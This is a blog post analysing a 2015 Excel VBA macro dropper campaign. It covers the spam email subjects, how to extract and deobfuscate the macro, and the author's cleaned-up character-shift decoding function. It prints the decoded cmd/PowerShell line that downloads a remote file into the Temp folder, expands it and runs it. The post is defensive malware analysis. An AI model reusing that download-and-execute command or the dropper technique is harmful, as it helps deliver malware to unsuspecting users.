New Dropper Variety — Lots of Variants Today

We’ve been hit by a lot of variants of a new dropper today, but they’ve only so far been connecting out to two addresses.

You’re going to want to be blocking:


These are packaged up in Excel VBA droppers, delivered as SPAM mail with titles like

Request Documentation [<RANDOM CHARACTERS>]
Claims Documentation [<RANDOM CHARACTERS>]
Invoice Delivery Failure [<RANDOM CHARACTERS>]

From addresses like:

From: Leonard []
From: Peterson <> 
From: Mitchell, Wed, 18 Feb 2015 12:21:43 +0200 [] 
From: Calderon []
Shepherd <>

NB. it’s very unlikely that the legitimate owners of any of these domains are involved in the attack.

The obfuscation technique is new — Office Malware Scanner can’t read the files by the default “info” scan, instead needing to use the “inflate” option.

This extracts the payload into your Temp folder. The payload contains a file called vbaProject.bin within a folder called xl.

Then, use the info scan in Office Malware Scanner to open that and it will extract in the region of ~23 modules and classes.

The code flow for all variants I’ve seen so far is

         +-       Module11.tyrtyaag
                          +-       Module14.NewQkeTzIIHM

It’s scarcely worth the effort understanding how these things deobfuscate their values any more, but this just looks like it hides it with ROT13!

The obfuscated values are passed in the function call in Module11.

The values are:


The cleaned up deobfuscation code from Module14 looks like this:

Public Function NewQkeTzIIHM(ByVal AESdyLylMjhJrIu As String) As String
Dim YyJDVSqLkdZk As Long
For YyJDVSqLkdZk = 1 To Len(AESdyLylMjhJrIu)
NewQkeTzIIHM = NewQkeTzIIHM & Chr(Asc(Mid(AESdyLylMjhJrIu, YyJDVSqLkdZk, 1)) — 13)
Next YyJDVSqLkdZk
Stop 'my addition
Debug.Print NewQkeTzIIHM 'my addition
End Function

The values actually deobfuscate to a cmd call to Powershell:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile(‘hxxp://','%TEMP%\'); expand %TEMP%\ %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

I’m no Powershell expert, but this looks like it pulls down a file from the URI, Saves it in the TEMP folder as a Cabinet file, which it then expands into an Executable and then runs it.

edit: Conrad Longmore has more here.

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.